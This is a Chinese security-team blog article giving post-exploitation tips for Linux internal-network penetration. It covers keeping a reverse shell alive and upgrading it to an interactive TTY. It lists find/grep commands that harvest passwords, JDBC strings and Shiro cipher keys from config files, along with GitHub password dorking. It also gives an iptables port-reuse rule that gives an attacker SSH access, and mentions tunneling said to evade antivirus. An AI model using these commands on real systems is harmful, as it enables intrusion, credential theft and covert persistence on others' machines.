本文由团队大佬Cedr0ic总结编写
姿势⼀-反弹shell后如何保持会话不断
⼀般弹回来⼀个shell后我们⾸先要确保shell不能掉,这⾥可以借⽤screen来保存会话
screen
screen -ls
Screen -r 会话id
姿势⼆-如何将反弹shell⽣成交互式的shell
⼀般反弹回来的shell有很多缺陷
1.⼀些命令,⽐如“su”和“ssh”需要适当的终端才能运⾏
2.标准错误信息(STDERR)经常不会被显示出来
3.不能正确使⽤⽂本编辑器如VIM
4.没有命令补全功能
5.“上”按键没有历史纪录功能
6.没有任务管理功能
7. Ctrl-C 会断
因此这⾥需要⽣成⼀个交互式shell以下⼏⾏命令可以完成操作。
python -c 'import pty; pty.spawn("/bin/bash")' //⽣成py半交互式shell ctrl+Z
stty raw -echo fg
reset
export SHELL=bash
export TERM=xterm256-color stty rows 38 columns 116
新的交互式shell
姿势三-如何快速信息收集获取服务器⼝令
⼀、⼝令获取
获得目标主机的权限后,通过查看网站的配置文件,获得口令信息
常⽤密码⽂件收集整理
find / -name *.properties 2>/dev/null | grep WEB-INF
find / -name "*.properties" | xargs egrep -i "user|pass|pwd|uname|login|db_" find / -regex ".*.properties|.*.conf|.*.config" | xargs grep -E "=jdbc:|pass="
find /webapp -regex ".*.properties" -print 2>/dev/null | xargs grep -E "=jdbc:|rsync"
find / -regex ".*.properties" -print 2>/dev/null
find / -regex ".*.properties|.*.conf|.*.config|.*.sh" | xargs grep -E "=jdbc:|pass=|passwd="
grep -r 'setCipherKey(Base64.decode(' /web路径
find / -regex ".*.xml|.*.properties|.*.conf|.*.config|.*.jsp" | xargs grep -E "setCipherKey"
⼆、github 搜密码技巧
xxx.com filename:properties
姿势四-隧道代理技术绕过⼤部分杀软
服务器出⽹:https://github.com/ehang-io/nps(安装使⽤⽅法这⾥省略)
⽀持多种协议代理⽅式
服务器不出⽹:使⽤端⼝复⽤技巧
iptables -t nat -I PREROUTING 1 -p tcp -s 攻击者的IP --dport 80 -j DNAT -- to-destination 靶机的IP:22
配置完成后,攻击者的IP连接靶机的80端⼝,可登录靶机的SSH服务;其它机器可正常访问靶机的HTTP服务;
攻击者的IP没法访问靶机的HTTP服务。
姿势五-使⽤脚本对内⽹常⻅服务进⾏快速扫描
扫描⼯具:只需要python环境不需要其他库
https://github.com/PINGXcpost/F-NAScan-PLUS
对F-NAScan-PLUS扫描报告中单个服务进⾏提取
https://github.com/soxfmr/F-NAScan-Export
【往期推荐】
干货|常用渗透漏洞poc、exp收集整理
【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
【奇淫巧技】如何成为一个合格的“FOFA”工程师
走过路过的大佬们留个关注再走呗
往期文章有彩蛋哦
安
全
扫描二维码 |关注我们
微信号 : WhITECat_007 | 名称:WhITECat安全团队
本文始发于微信公众号(渗透Xiao白帽):内网渗透之从信息收集到横向独家姿势总结-linux篇
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论